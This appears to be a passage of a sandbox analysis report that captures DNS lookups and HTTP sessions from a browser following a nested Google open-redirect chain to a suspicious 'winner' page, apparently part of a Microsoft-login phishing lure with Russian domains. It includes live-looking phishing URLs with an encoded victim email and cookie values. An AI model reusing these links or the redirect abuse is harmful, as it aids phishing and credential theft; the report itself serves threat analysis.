                                                                  Jan 13, 2025 22:52:45.872534037 CET1.1.1.1192.168.2.40x714fNo error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                  Jan 13, 2025 22:52:45.872534037 CET1.1.1.1192.168.2.40x714fNo error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                  Jan 13, 2025 22:53:01.600713968 CET1.1.1.1192.168.2.40xa5d4No error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                  Jan 13, 2025 22:53:01.600749969 CET1.1.1.1192.168.2.40xc09aNo error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                  Jan 13, 2025 22:53:30.695236921 CET1.1.1.1192.168.2.40xd68fNo error (0)identity.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                  • google.com
                                                                  • www.google.com
                                                                  • ilikethislife.com
                                                                  • https:
                                                                    • rfll.yordickyel.ru
                                                                    • code.jquery.com
                                                                    • challenges.cloudflare.com
                                                                    • cdnjs.cloudflare.com
                                                                    • votcsygtms0fxymxuiwkkjlrgdrdqvm6ovda6twx3bjts5vu90kea.chiblaispi.ru
                                                                  • a.nel.cloudflare.com
                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.449744142.250.186.1104435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-13 21:52:20 UTC2162OUTGET /url?q=https%3A%2F%2Fwww.google.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3D.%2F%2F%2F%2Famp%2Fs%2Filikethislife.com%2Fwinner%2F0SfNj%2FY2N1ZGR5cmVAc3lmdGNvLmNvbQ%3D%3D%3F0s57db%3DMTMmMTMmMTMmMTMmQjEmRjQmb2JxdEczJkQ0Jk11bHdyVGhHeUtZLi45SjNYNlJyamY6ckY0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEmRjQmbW51aUczJkQ0JkIxJkY0JnplcGNHMyZENCZCMSZGNCZ6ZXBjRDQmQjEmRjQmZWJmaUczJkQ0JkIxJkY0JmZtenV0RzMmRDQmMTMmMTMmMTMmMTMmQjEmRTgmMTMmMTMmMTMmMTMmMTMmMTMmMTMmMTMmQjEmQzQmb2ZlZWppMTMmQjQmenVqbWpjanRqdzEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJkIxJkM0JmZ1aml4MTMmQjQmc3BtcGQxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZDOCYxMyZ1eWZ1Lm9mZWVqaS8xMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZGNCZmbXp1dEQ0JjEzJjEzJjEzJjEzJkIxJkY0JmZtdWp1RzMmRDQmZm5wSUY0JmZtdWp1RDQmMTMmMTMmMTMmMTMmQjEmRzMmKzEzJmZzMTMmZWViMTMmRTQmRTQmRTQmRTQmRTQmRTQmRDQmMTMmK0czJjEzJjEzJkY0JjMzJkI6NjMmMTk2MyYzRjYzJkRCNjMmMzk2MyYzRjYzJjRCNjMmNEQ2MyY1MyY1MyZCOjYzJjE5NjMmM0Y2MyZEQjYzJjM5NjMmM0Y2MyY0QjYzJj [TRUNCATED]
                                                                  Host: google.com
                                                                  Connection: keep-alive
                                                                  Upgrade-Insecure-Requests: 1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Sec-Fetch-Site: none
                                                                  Sec-Fetch-Mode: navigate
                                                                  Sec-Fetch-User: ?1
                                                                  Sec-Fetch-Dest: document
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-01-13 21:52:21 UTC2157INHTTP/1.1 301 Moved Permanently
                                                                  Location: https://www.google.com/url?q=https%3A%2F%2Fwww.google.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3D.%2F%2F%2F%2Famp%2Fs%2Filikethislife.com%2Fwinner%2F0SfNj%2FY2N1ZGR5cmVAc3lmdGNvLmNvbQ%3D%3D%3F0s57db%3DMTMmMTMmMTMmMTMmQjEmRjQmb2JxdEczJkQ0Jk11bHdyVGhHeUtZLi45SjNYNlJyamY6ckY0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEmRjQmbW51aUczJkQ0JkIxJkY0JnplcGNHMyZENCZCMSZGNCZ6ZXBjRDQmQjEmRjQmZWJmaUczJkQ0JkIxJkY0JmZtenV0RzMmRDQmMTMmMTMmMTMmMTMmQjEmRTgmMTMmMTMmMTMmMTMmMTMmMTMmMTMmMTMmQjEmQzQmb2ZlZWppMTMmQjQmenVqbWpjanRqdzEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJkIxJkM0JmZ1aml4MTMmQjQmc3BtcGQxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZDOCYxMyZ1eWZ1Lm9mZWVqaS8xMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZGNCZmbXp1dEQ0JjEzJjEzJjEzJjEzJkIxJkY0JmZtdWp1RzMmRDQmZm5wSUY0JmZtdWp1RDQmMTMmMTMmMTMmMTMmQjEmRzMmKzEzJmZzMTMmZWViMTMmRTQmRTQmRTQmRTQmRTQmRTQmRDQmMTMmK0czJjEzJjEzJkY0JjMzJkI6NjMmMTk2MyYzRjYzJkRCNjMmMzk2MyYzRjYzJjRCNjMmNEQ2MyY1MyY1MyZCOjYzJjE5NjMmM0Y2My [TRUNCATED]
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-eC3WVqbYg3aNg-gUVaSS7A' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other
                                                                  Permissions-Policy: unload=()
                                                                  Date: Mon, 13 Jan 2025 21:52:21 GMT
                                                                  Expires: Wed, 12 Feb 2025 21:52:21 GMT
                                                                  Cache-Control: public, max-age=2592000
                                                                  Server: gws
                                                                  Content-Length: 1733
                                                                  X-XSS-Protection: 0
                                                                  X-Frame-Options: SAMEORIGIN
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close
                                                                  2025-01-13 21:52:21 UTC1733INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 75 72 6c 3f 71 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 25 32 46 75 72 6c 25 33 46 71 25 33 44 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77
                                                                  Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="https://www.google.com/url?q=https%3A%2F%2Fwww.google.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  1192.168.2.449739142.250.185.2284435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-13 21:52:21 UTC2166OUTGET /url?q=https%3A%2F%2Fwww.google.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3D.%2F%2F%2F%2Famp%2Fs%2Filikethislife.com%2Fwinner%2F0SfNj%2FY2N1ZGR5cmVAc3lmdGNvLmNvbQ%3D%3D%3F0s57db%3DMTMmMTMmMTMmMTMmQjEmRjQmb2JxdEczJkQ0Jk11bHdyVGhHeUtZLi45SjNYNlJyamY6ckY0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEmRjQmbW51aUczJkQ0JkIxJkY0JnplcGNHMyZENCZCMSZGNCZ6ZXBjRDQmQjEmRjQmZWJmaUczJkQ0JkIxJkY0JmZtenV0RzMmRDQmMTMmMTMmMTMmMTMmQjEmRTgmMTMmMTMmMTMmMTMmMTMmMTMmMTMmMTMmQjEmQzQmb2ZlZWppMTMmQjQmenVqbWpjanRqdzEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJkIxJkM0JmZ1aml4MTMmQjQmc3BtcGQxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZDOCYxMyZ1eWZ1Lm9mZWVqaS8xMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZGNCZmbXp1dEQ0JjEzJjEzJjEzJjEzJkIxJkY0JmZtdWp1RzMmRDQmZm5wSUY0JmZtdWp1RDQmMTMmMTMmMTMmMTMmQjEmRzMmKzEzJmZzMTMmZWViMTMmRTQmRTQmRTQmRTQmRTQmRTQmRDQmMTMmK0czJjEzJjEzJkY0JjMzJkI6NjMmMTk2MyYzRjYzJkRCNjMmMzk2MyYzRjYzJjRCNjMmNEQ2MyY1MyY1MyZCOjYzJjE5NjMmM0Y2MyZEQjYzJjM5NjMmM0Y2MyY0QjYzJj [TRUNCATED]
                                                                  Host: www.google.com
                                                                  Connection: keep-alive
                                                                  Upgrade-Insecure-Requests: 1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Sec-Fetch-Site: none
                                                                  Sec-Fetch-Mode: navigate
                                                                  Sec-Fetch-User: ?1
                                                                  Sec-Fetch-Dest: document
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-01-13 21:52:21 UTC2395INHTTP/1.1 302 Found
                                                                  Location: https://www.google.com/url?q=https://www.google.com/url?q=https://www.google.com/url?q=.////amp/s/ilikethislife.com/winner/0SfNj/Y2N1ZGR5cmVAc3lmdGNvLmNvbQ==?0s57db=MTMmMTMmMTMmMTMmQjEmRjQmb2JxdEczJkQ0Jk11bHdyVGhHeUtZLi45SjNYNlJyamY6ckY0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEmRjQmbW51aUczJkQ0JkIxJkY0JnplcGNHMyZENCZCMSZGNCZ6ZXBjRDQmQjEmRjQmZWJmaUczJkQ0JkIxJkY0JmZtenV0RzMmRDQmMTMmMTMmMTMmMTMmQjEmRTgmMTMmMTMmMTMmMTMmMTMmMTMmMTMmMTMmQjEmQzQmb2ZlZWppMTMmQjQmenVqbWpjanRqdzEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJkIxJkM0JmZ1aml4MTMmQjQmc3BtcGQxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZDOCYxMyZ1eWZ1Lm9mZWVqaS8xMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZGNCZmbXp1dEQ0JjEzJjEzJjEzJjEzJkIxJkY0JmZtdWp1RzMmRDQmZm5wSUY0JmZtdWp1RDQmMTMmMTMmMTMmMTMmQjEmRzMmKzEzJmZzMTMmZWViMTMmRTQmRTQmRTQmRTQmRTQmRTQmRDQmMTMmK0czJjEzJjEzJkY0JjMzJkI6NjMmMTk2MyYzRjYzJkRCNjMmMzk2MyYzRjYzJjRCNjMmNEQ2MyY1MyY1MyZCOjYzJjE5NjMmM0Y2MyZEQjYzJjM5NjMmM0Y2MyY0QjYzJjRENjMmRTQmRTQmeGN6Nnpka21IZXtHSGN4MlRaelM0Wm1HSFJpT1hidkdIZXs2V [TRUNCATED]
                                                                  Cache-Control: private
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-Jz6gVqydU8hE0bP6c9DVxQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other
                                                                  Permissions-Policy: unload=()
                                                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                  Date: Mon, 13 Jan 2025 21:52:21 GMT
                                                                  Server: gws
                                                                  Content-Length: 1626
                                                                  X-XSS-Protection: 0
                                                                  Set-Cookie: NID=520=gTZ8H-0s0GWh26OgJ-aAWSkPK4fXgEWAidOoZyFlDbhGEpzEX-fgkhQInP4x5Pal_0FuRhu62_2ObwLcBF__GDWvkCRh_2BBeUdPXSKRIBktGtqSrSTupKBjfWWUUn1hpSNgnxz1asCGVu-lte8UIXA3ye3wWYWtHYedRRvou3sY8gt6RJ5MpXRiDIuKMyQxghvBoifIMQ; expires=Tue, 15-Jul-2025 21:52:21 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close
                                                                  2025-01-13 21:52:21 UTC1281INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 75 72 6c 3f 71 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 75 72 6c 3f 71 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 75 72 6c 3f 71 3d
                                                                  Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/url?q=https://www.google.com/url?q=https://www.google.com/url?q=
                                                                  2025-01-13 21:52:21 UTC126INData Raw: 4d 7a 4d 6d 52 54 51 6d 64 57 39 6d 64 57 39 77 5a 44 45 7a 4a 6a 4d 7a 4a 6d 6c 30 5a 6e 4e 6e 5a 6e 4d 7a 4d 79 5a 46 4e 43 5a 33 61 6e 5a 79 5a 69 35 78 64 58 56 70 4d 54 4d 6d 59 6e 56 6d 62 6b 51 30 4a 6a 45 7a 4a 6a 45 7a 4a 6a 45 7a 4a 6a 45 7a 4a 6b 49 78 4a 6b 59 30 4a 6a 4d 7a 4a 6a 6b 75 52 31 56 57 4d 7a 4d 6d 52 54 51 6d 64 57 5a 30 63 32 4a 70 5a 44 45 7a 4a 6d
                                                                  Data Ascii: MzMmRTQmdW9mdW9wZDEzJjMzJml0ZnNnZnMzMyZFNCZ3anZyZi5xdXVpMTMmYnVmbkQ0JjEzJjEzJjEzJjEzJkIxJkY0JjMzJjkuR1VWMzMmRTQmdWZ0c2JpZDEzJm
                                                                  2025-01-13 21:52:21 UTC219INData Raw: 4a 31 5a 6d 35 45 4e 43 59 78 4d 79 59 78 4d 79 59 78 4d 79 59 78 4d 79 5a 43 4d 53 5a 47 4e 43 5a 6c 59 6d 5a 70 52 44 51 6d 51 6a 45 6d 52 6a 51 6d 62 57 35 31 61 55 51 30 4a 6b 49 78 4a 6b 59 30 4a 6d 39 69 63 58 52 48 4d 79 5a 45 4e 43 5a 6b 61 7a 64 6f 57 6c 5a 45 4e 43 5a 30 65 7a 56 4e 52 54 51 6d 54 46 68 74 65 44 46 50 55 57 64 6b 57 46 42 5a 63 33 73 31 64 30 63 35 65 31 46 46 4e 69 5a 44 54 30 59 30 4a 6a 4d 7a 4a 6e 56 35 5a 6e 55 75 62 32 5a 6c 5a 57 70 70 4d 7a 4d 6d 52 54 51 6d 64 48 52 69 62 57 51 78 4d 79 5a 76 59 6e 46 30 52 44 51 6d 51 6a 45 6d 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                  Data Ascii: J1Zm5ENCYxMyYxMyYxMyYxMyZCMSZGNCZlYmZpRDQmQjEmRjQmbW51aUQ0JkIxJkY0Jm9icXRHMyZENCZkazdoWlZENCZ0ezVNRTQmTFhteDFPUWdkWFBZc3s1d0c5e1FFNiZDT0Y0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEm">here</A>.</BODY></HTML>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  2192.168.2.449745142.250.185.2284435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-13 21:52:22 UTC2283OUTGET /url?q=https://www.google.com/url?q=https://www.google.com/url?q=.////amp/s/ilikethislife.com/winner/0SfNj/Y2N1ZGR5cmVAc3lmdGNvLmNvbQ==?0s57db=MTMmMTMmMTMmMTMmQjEmRjQmb2JxdEczJkQ0Jk11bHdyVGhHeUtZLi45SjNYNlJyamY6ckY0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEmRjQmbW51aUczJkQ0JkIxJkY0JnplcGNHMyZENCZCMSZGNCZ6ZXBjRDQmQjEmRjQmZWJmaUczJkQ0JkIxJkY0JmZtenV0RzMmRDQmMTMmMTMmMTMmMTMmQjEmRTgmMTMmMTMmMTMmMTMmMTMmMTMmMTMmMTMmQjEmQzQmb2ZlZWppMTMmQjQmenVqbWpjanRqdzEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJkIxJkM0JmZ1aml4MTMmQjQmc3BtcGQxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZDOCYxMyZ1eWZ1Lm9mZWVqaS8xMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZGNCZmbXp1dEQ0JjEzJjEzJjEzJjEzJkIxJkY0JmZtdWp1RzMmRDQmZm5wSUY0JmZtdWp1RDQmMTMmMTMmMTMmMTMmQjEmRzMmKzEzJmZzMTMmZWViMTMmRTQmRTQmRTQmRTQmRTQmRTQmRDQmMTMmK0czJjEzJjEzJkY0JjMzJkI6NjMmMTk2MyYzRjYzJkRCNjMmMzk2MyYzRjYzJjRCNjMmNEQ2MyY1MyY1MyZCOjYzJjE5NjMmM0Y2MyZEQjYzJjM5NjMmM0Y2MyY0QjYzJjRENjMmRTQmRTQmeGN6Nnpka21IZXtHSGN4MlRaelM0Wm1HSFJpT1hidkdIZXs2VFp2R25bbVM0ZEczJkROUEVHMyZ6Z [TRUNCATED]
                                                                  Host: www.google.com
                                                                  Connection: keep-alive
                                                                  Upgrade-Insecure-Requests: 1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Sec-Fetch-Site: none
                                                                  Sec-Fetch-Mode: navigate
                                                                  Sec-Fetch-User: ?1
                                                                  Sec-Fetch-Dest: document
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Cookie: NID=520=gTZ8H-0s0GWh26OgJ-aAWSkPK4fXgEWAidOoZyFlDbhGEpzEX-fgkhQInP4x5Pal_0FuRhu62_2ObwLcBF__GDWvkCRh_2BBeUdPXSKRIBktGtqSrSTupKBjfWWUUn1hpSNgnxz1asCGVu-lte8UIXA3ye3wWYWtHYedRRvou3sY8gt6RJ5MpXRiDIuKMyQxghvBoifIMQ
                                                                  2025-01-13 21:52:22 UTC1973INHTTP/1.1 302 Found
                                                                  Location: https://www.google.com/url?q=https://www.google.com/url?q=.////amp/s/ilikethislife.com/winner/0SfNj/Y2N1ZGR5cmVAc3lmdGNvLmNvbQ==?0s57db=MTMmMTMmMTMmMTMmQjEmRjQmb2JxdEczJkQ0Jk11bHdyVGhHeUtZLi45SjNYNlJyamY6ckY0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEmRjQmbW51aUczJkQ0JkIxJkY0JnplcGNHMyZENCZCMSZGNCZ6ZXBjRDQmQjEmRjQmZWJmaUczJkQ0JkIxJkY0JmZtenV0RzMmRDQmMTMmMTMmMTMmMTMmQjEmRTgmMTMmMTMmMTMmMTMmMTMmMTMmMTMmMTMmQjEmQzQmb2ZlZWppMTMmQjQmenVqbWpjanRqdzEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJkIxJkM0JmZ1aml4MTMmQjQmc3BtcGQxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZDOCYxMyZ1eWZ1Lm9mZWVqaS8xMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZGNCZmbXp1dEQ0JjEzJjEzJjEzJjEzJkIxJkY0JmZtdWp1RzMmRDQmZm5wSUY0JmZtdWp1RDQmMTMmMTMmMTMmMTMmQjEmRzMmKzEzJmZzMTMmZWViMTMmRTQmRTQmRTQmRTQmRTQmRTQmRDQmMTMmK0czJjEzJjEzJkY0JjMzJkI6NjMmMTk2MyYzRjYzJkRCNjMmMzk2MyYzRjYzJjRCNjMmNEQ2MyY1MyY1MyZCOjYzJjE5NjMmM0Y2MyZEQjYzJjM5NjMmM0Y2MyY0QjYzJjRENjMmRTQmRTQmeGN6Nnpka21IZXtHSGN4MlRaelM0Wm1HSFJpT1hidkdIZXs2VFp2R25bbVM0ZEczJkROUEVHMyZ6Zn [TRUNCATED]
                                                                  Cache-Control: private
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-sg1LCOvuS3dscB0sLkbCkw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other
                                                                  Permissions-Policy: unload=()
                                                                  Date: Mon, 13 Jan 2025 21:52:22 GMT
                                                                  Server: gws
                                                                  Content-Length: 1597
                                                                  X-XSS-Protection: 0
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close
                                                                  2025-01-13 21:52:22 UTC1597INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 75 72 6c 3f 71 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 75 72 6c 3f 71 3d 2e 2f 2f 2f 2f 61 6d 70 2f 73 2f 69 6c 69 6b 65 74 68 69 73 6c 69 66 65 2e 63 6f 6d 2f
                                                                  Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/url?q=https://www.google.com/url?q=.////amp/s/ilikethislife.com/


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  3192.168.2.449746142.250.185.2284435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-13 21:52:23 UTC2254OUTGET /url?q=https://www.google.com/url?q=.////amp/s/ilikethislife.com/winner/0SfNj/Y2N1ZGR5cmVAc3lmdGNvLmNvbQ==?0s57db=MTMmMTMmMTMmMTMmQjEmRjQmb2JxdEczJkQ0Jk11bHdyVGhHeUtZLi45SjNYNlJyamY6ckY0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEmRjQmbW51aUczJkQ0JkIxJkY0JnplcGNHMyZENCZCMSZGNCZ6ZXBjRDQmQjEmRjQmZWJmaUczJkQ0JkIxJkY0JmZtenV0RzMmRDQmMTMmMTMmMTMmMTMmQjEmRTgmMTMmMTMmMTMmMTMmMTMmMTMmMTMmMTMmQjEmQzQmb2ZlZWppMTMmQjQmenVqbWpjanRqdzEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJkIxJkM0JmZ1aml4MTMmQjQmc3BtcGQxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZDOCYxMyZ1eWZ1Lm9mZWVqaS8xMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZGNCZmbXp1dEQ0JjEzJjEzJjEzJjEzJkIxJkY0JmZtdWp1RzMmRDQmZm5wSUY0JmZtdWp1RDQmMTMmMTMmMTMmMTMmQjEmRzMmKzEzJmZzMTMmZWViMTMmRTQmRTQmRTQmRTQmRTQmRTQmRDQmMTMmK0czJjEzJjEzJkY0JjMzJkI6NjMmMTk2MyYzRjYzJkRCNjMmMzk2MyYzRjYzJjRCNjMmNEQ2MyY1MyY1MyZCOjYzJjE5NjMmM0Y2MyZEQjYzJjM5NjMmM0Y2MyY0QjYzJjRENjMmRTQmRTQmeGN6Nnpka21IZXtHSGN4MlRaelM0Wm1HSFJpT1hidkdIZXs2VFp2R25bbVM0ZEczJkROUEVHMyZ6ZndzdnR0c2Z6YkczJmx2L3BkL3pmd3 [TRUNCATED]
                                                                  Host: www.google.com
                                                                  Connection: keep-alive
                                                                  Upgrade-Insecure-Requests: 1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Sec-Fetch-Site: none
                                                                  Sec-Fetch-Mode: navigate
                                                                  Sec-Fetch-User: ?1
                                                                  Sec-Fetch-Dest: document
